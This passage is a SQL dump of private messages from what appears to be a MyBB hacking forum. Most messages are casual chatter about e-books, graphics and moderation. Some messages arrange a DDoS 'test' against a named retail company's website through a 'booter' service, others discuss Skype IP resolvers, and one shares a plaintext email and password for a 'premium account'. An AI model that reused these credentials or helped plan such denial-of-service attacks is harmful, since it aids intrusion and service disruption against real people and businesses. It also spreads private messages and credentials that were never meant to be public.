`recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1589', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Mod Mycode', '0', '[quote=\'t3h jok3r\'] I fixed it in the exploit program thread. The thing is that there should be no spaces between the text and the code. So it should be [mod]etc etc example not [mod] hi this is an example Sorry for not clarifying it in the mycode thread. [/quote] ALright thanks, I did it on my school pc so I thought it was that aha.', '1347488928', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1593', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Eyyyy Thread design', '0', '[quote=\'iTzIpod\'] [quote=\'sirchamp\'] Hello Im in the need of a thread design again. Coz i wrote a new e-book. I will send you the text and the threadesign.psd later. I will pay 0.50 cents per sold e-book if you make me this thread design. I will send you the text and .psd tomorow. Thanks :D [/quote] .. Dude what the hell.. You said that you were going to need a thread design done by me for the other eBook you were selling. And then you said you canceled it because you already did it... And I already made it for you.. And then now you are telling me to make another one for you. -.- Why not just make that one for yourself since you did that to the previous one.. [/quote] Well I canceled it because you hadnt made it yet. Coz I made a shitty thread design. And i told you to write me when you start. But nvm. You are a lq member anyway. You havent made one tutorial yet. You just contribute to the forum with shit graphic designs and posts like \"thanks\" \"lol\" etc ', '1347536167', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1601', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Eyyyy Thread design', '0', '[quote=\'iTzIpod\'] [quote=\'sirchamp\'] [quote=\'iTzIpod\'] [quote=\'sirchamp\'] Hello Im in the need of a thread design again. Coz i wrote a new e-book. I will send you the text and the threadesign.psd later. I will pay 0.50 cents per sold e-book if you make me this thread design. I will send you the text and .psd tomorow. Thanks :D [/quote] .. Dude what the hell.. You said that you were going to need a thread design done by me for the other eBook you were selling. And then you said you canceled it because you already did it... And I already made it for you.. And then now you are telling me to make another one for you. -.- Why not just make that one for yourself since you did that to the previous one.. [/quote] Well I canceled it because you hadnt made it yet. Coz I made a shitty thread design. And i told you to write me when you start. But nvm. You are a lq member anyway. You havent made one tutorial yet. You just contribute to the forum with shit graphic designs and posts like \"thanks\" \"lol\" etc [/quote] How am I a Mod then? [/quote] Coz you are the whole day on the forum reading...... and posting spam comments. Joker made you mod coz you are active nothing more.Stop bosting with admin rights. Kid', '1347542838', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1612', '67', '67', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Skype IP', '0', 'Hey. I found this website yesterday. And I decided to release it to the community. It finds the Skype ID\'s IP. Check out the thread here: http://l33thacking.net/thread-401.html =] ', '1347631547', '0', '3', '1347649927', '1', '0', '2', '1347649881'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1616', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'E-book', '0', 'do you want a vouch copy of my e-book? xD Link: http://www.mediafire.com/?occs2rh1zx2241d Password: l33t thanks', '1347649333', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1622', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: sup', '0', '[quote=\'t3h jok3r\'] Sup long time no see, what you been up to? [/quote] Im online everyday. But I have had lots of tests the last week. And in the next 2 weeks I also have lots of tests-.- But after that I have a free period. But Im still online 30-60min a day. And I hope you will read my e-book :)', '1347649474', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1624', '67', '82', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Skype IP', '0', '[quote=\'iTzIpod\'] Hey. I found this website yesterday. And I decided to release it to the community. It finds the Skype ID\'s IP. Check out the thread here: http://l33thacking.net/thread-401.html =] [/quote] Ah, im admin on that page. ', '1347649927', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1626', '67', '100', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Vouch Ddos', '0', 'Hey. Take down www.ica.no as a test. MSG Me 30 mins before you do it, and msg me 1 min before you do it please.', '1347650103', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1627', '67', '67', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Skype IP', '0', '[quote=\'HoverCatz\'] [quote=\'iTzIpod\'] Hey. I found this website yesterday. And I decided to release it to the community. It finds the Skype ID\'s IP. Check out the thread here: http://l33thacking.net/thread-401.html =] [/quote] Ah, im admin on that page. [/quote] What do you mean?', '1347650466', '0', '1', '0', '1', '0', '2', '1347651276'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3363', '62', '257', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', ' Threaded Mode | Linear Mode MINECRAFT PREMIUM GIVEAWAY(no surveys) ', '0', 'Can i have one? Thanks in advance bro.', '1350553528', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1644', '67', '67', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Vouch Ddos', '0', '[quote=\'HoverCatz\'] Hey. Take down www.ica.no as a test. MSG Me 30 mins before you do it, and msg me 1 min before you do it please. [/quote] That\'s a huge chain company??', '1347657748', '0', '3', '1347792179', '0', '0', '0', '1347792056'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1645', '100', '67', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '2', 'Re: Vouch Ddos', '0', '[quote=\'HoverCatz\'] Hey. Take down www.ica.no as a test. MSG Me 30 mins before you do it, and msg me 1 min before you do it please. [/quote] That\'s a huge chain company??', '1347657748', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1676', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Warning', '0', '[quote=\'t3h jok3r\'] You are not allowed to [b]DELETE[/b] threads. You should use the junk tool no matter what kind of thread it is. [/quote] Oh sorry, I was at school and alot of the options don\'t come up for some reason, so I just used that. Since he took my astro pid and re uploaded it and tryed to make his own thread. in the same section.. I just deleted it. Ill make sure I don\'t do it again.', '1347665267', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1692', '67', '67', '82', 'a:1:{s:2:\"to\";a:4:{i:0;s:2:\"67\";i:1;s:2:\"62\";i:2;s:3:\"112\";i:3;s:2:\"20\";}}', '5', 'Read', '0', 'Be sure to check out Unique Headquarters ;) There are a lot of threads waiting to be read!', '1347667327', '0', '1', '0', '1', '0', '2', '1347792045'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1732', '55', '1', '55', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] Sup man long time no see. [/quote] school homework girls yea yea yea, how you been sorry for inactivity ', '1347683812', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1735', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: E-book', '0', '[quote=\'t3h jok3r\'] [quote=\'sirchamp\'] do you want a vouch copy of my e-book? xD Link: http://www.mediafire.com/?occs2rh1zx2241d Password: l33t thanks [/quote] Thanks, I will post my review soon. [/quote] Thanks a lot for your review. It was my first e-book :S ', '1347694102', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3365', '257', '62', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'that premium account ', '0', 'hey reloazor, whats up here is that premium account please don\'t change the passwordddddd username:the.big.d.man@hotmail.com password:chicken737 please dont change it. please say thanks on the thread rep me if i helped you and rate the thread if i helped you dont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)', '1350553717', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3367', '62', '257', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: that premium account ', '0', '[quote=\'?(???)?TREYZ?(???)?\'] hey reloazor, whats up here is that premium account please don\'t change the passwordddddd username:the.big.d.man@hotmail.com password:chicken737 please dont change it. please say thanks on the thread rep me if i helped you and rate the thread if i helped you dont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :) [/quote] Repped you, thanks alot. I wont change the PW, dont worry.', '1350554355', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3369', '257', '62', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: that premium account ', '0', '[quote=\'R?????zo?\'] [quote=\'?(???)?TREYZ?(???)?\'] hey reloazor, whats up here is that premium account please don\'t change the passwordddddd username:the.big.d.man@hotmail.com password:chicken737 please dont change it. please say thanks on the thread rep me if i helped you and rate the thread if i helped you dont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :) [/quote] Repped you, thanks alot. I wont change the PW, dont worry. [/quote] thanks for understanding:)', '1350554533', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3371', '222', '228', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Yo...', '0', 'wanna delete that stars thread? Second glance they are alright :P', '1350556854', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3373', '228', '222', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Yo', '0', 'It is now gone', '1350556998', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3375', '222', '228', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Yo', '0', '[quote=\'VirtualLegend\'] It is now gone [/quote] ok thanks broski :D', '1350557336', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3377', '228', '222', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Re: Yo', '0', '[quote=\'ƒ???????????g\'] [quote=\'VirtualLegend\'] It is now gone [/quote] ok thanks broski :D [/quote] No Problem', '1350557364', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3379', '100', '257', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Minecraft Premium Account', '0', 'Hello, can I have this account?', '1350558300', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3381', '222', '61', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Yo....', '0', 'http://l33thacking.net/thread-940.html....hehehe Get on skype and Ill give you what I got when I get back from the store...:D ', '1350562293', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3383', '2', '222', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Source', '0', 'Could you send me the source? Thanks man.', '1350564065', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1753', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Font', '0', '[quote=\'iTzIpod\'] What font did you use for your Gamer Userbar? [/quote] http://www.dafont.com/8bit-wonder.font', '1347724611', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1757', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'skype api', '0', 'Does your skype resolver api still work? mines down and I\'m trying to code a exe based resolver.', '1347734615', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1761', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: skype api', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] Does your skype resolver api still work? mines down and I\'m trying to code a exe based resolver. [/quote] It\'s down. [/quote] lame, I coded this whole thing and than tryed to use my old api and realised it\'s down :/ ill try to find a new one I guess.', '1347736753', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1764', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: skype api', '0', '\'m doing that now. I have no idea how Ill find it but meh. Ill give it a shot.', '1347737322', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1768', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: skype api', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] \'m doing that now. I have no idea how Ill find it but meh. Ill give it a shot. [/quote] Lol The site is http://skyperesolver.info/login.php Also, issue a SPAM Warning to iTzIpod. [/quote] I can\'t get anything from that site.', '1347737793', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1771', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: skype api', '0', 'I have an account I need to pay to actually get o the skype resolver page and from the resolver page I might be able to grab there API from the page source code. But i\'m not paying 2$ just on a chance I might be able to get it.', '1347738126', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1791', '55', '1', '55', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] [quote=\'Baws\'] [quote=\'t3h jok3r\'] Sup man long time no see. [/quote] school homework girls yea yea yea, how you been sorry for inactivity [/quote] Lol same and it\'s cool. Actually not just school, homework and girls there\'s more with me. - Hospital - Social Engineering - LH maintenance and advertising [/quote] Yea that\'s too much work. What\'s with the hospital?', '1347747756', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1796', '55', '1', '55', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] [quote=\'Baws\'] [quote=\'t3h jok3r\'] [quote=\'Baws\'] [quote=\'t3h jok3r\'] Sup man long time no see. [/quote] school homework girls yea yea yea, how you been sorry for inactivity [/quote] Lol same and it\'s cool. Actually not just school, homework and girls there\'s more with me. - Hospital - Social Engineering - LH maintenance and advertising [/quote] Yea that\'s too much work. What\'s with the hospital? [/quote] I have a rib cage injury because I was in a car rack, I slipped and fell two weeks ago so all the ribs that were healed, opened up again. [/quote] Damn that sucks, hope you get better. Junior year in Cali is shitload of work, first 2 days and I gotta essay. ', '1347747893', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1807', '55', '1', '55', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] [quote=\'Baws\'] [quote=\'t3h jok3r\'] [quote=\'Baws\'] [quote=\'t3h jok3r\'] [quote=\'Baws\'] [quote=\'t3h jok3r\'] Sup man long time no see. [/quote] school homework girls yea yea yea, how you been sorry for inactivity [/quote] Lol same and it\'s cool. Actually not just school, homework and girls there\'s more with me. - Hospital - Social Engineering - LH maintenance and advertising [/quote] Yea that\'s too much work. What\'s with the hospital? [/quote] I have a rib cage injury because I was in a car rack, I slipped and fell two weeks ago so all the ribs that were healed, opened up again. [/quote] Damn that sucks, hope you get better. Junior year in Cali is shitload of work, first 2 days and I gotta essay. [/quote] Thanks, fucking sucks. When is it due? [/quote] You\'re always assigned an essay a week before it\'s due, so it\'s like on Monday :L', '1347748361', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1812', '55', '1', '55', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] [quote=\'Baws\'] [quote=\'t3h jok3r\'] [quote=\'Baws\'] [quote=\'t3h jok3r\'] [quote=\'Baws\'] [quote=\'t3h jok3r\'] [quote=\'Baws\'] [quote=\'t3h jok3r\'] Sup man long time no see. [/quote] school homework girls yea yea yea, how you been sorry for inactivity [/quote] Lol same and it\'s cool. Actually not just school, homework and girls there\'s more with me. - Hospital - Social Engineering - LH maintenance and advertising [/quote] Yea that\'s too much work. What\'s with the hospital? [/quote] I have a rib cage injury because I was in a car rack, I slipped and fell two weeks ago so all the ribs that were healed, opened up again. [/quote] Damn that sucks, hope you get better. Junior year in Cali is shitload of work, first 2 days and I gotta essay. [/quote] Thanks, fucking sucks. When is it due? [/quote] You\'re always assigned an essay a week before it\'s due, so it\'s like on Monday :L [/quote] Aren\'t you guys off on Monday and Tuesday? [/quote] Nope...We get Saturday and Sunday off. Where do you live again?', '1347748881', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1815', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: E-book', '0', '[quote=\'t3h jok3r\'] [quote=\'sirchamp\'] [quote=\'t3h jok3r\'] [quote=\'sirchamp\'] do you want a vouch copy of my e-book? xD Link: http://www.mediafire.com/?occs2rh1zx2241d Password: l33t thanks [/quote] Thanks, I will post my review soon. [/quote] Thanks a lot for your review. It was my first e-book :S [/quote] :) Thanks. Well I read lots of E-Books. So I kinda knew how to make one. Oh wow, I thought it was like your 5th or something because the explanations, images and introduction were kinda professional. [/quote]', '1347782618', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1817', '67', '100', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Re: Vouch Ddos', '0', '[quote=\'GRONgamer61\'] [quote=\'HoverCatz\'] Hey. Take down www.ica.no as a test. MSG Me 30 mins before you do it, and msg me 1 min before you do it please. [/quote] That\'s a huge chain company?? [/quote] Are you attacking from your home internet? Its not dangerous attacking it from a booter', '1347792179', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1824', '67', '67', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Read', '0', 'What\'s ibooter.org? ', '1347804796', '0', '3', '1347896001', '1', '0', '2', '1347895983'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1860', '193', '1', '193', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'hai', '0', 'are u from l33thakcers.com bcoz its looks sililar likes it u done a good job', '1347894849', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1862', '67', '82', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\'] What\'s ibooter.org? [/quote] My private booter :)', '1347896001', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1879', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'read', '0', 'I love every single one you made. ... Now I have to pick which one I like the most.', '1347935296', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1883', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: read', '0', '[quote=\'iTzIpod\'] [quote=\'NXK\'] I love every single one you made. ... Now I have to pick which one I like the most. [/quote] How... They\'re all ugly :/ [/quote] The first one is amazing, It\'s so perfect and classic. Ill be using this one for sure.', '1347935417', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1887', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: read', '0', 'It\'s amazing ', '1347936066', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1902', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Help', '0', '[quote=\'t3h jok3r\'] Recently my PC broke down so I wont be able to log on long because I will log on my sisters PC. I\'m not sure by when I will get my new laptop but I\'m sure it will be around a week. Please try to keep LH active and please search for spam and take immediate action. [/quote] Will do man:)', '1348024944', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1904', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Help', '0', '[quote=\'t3h 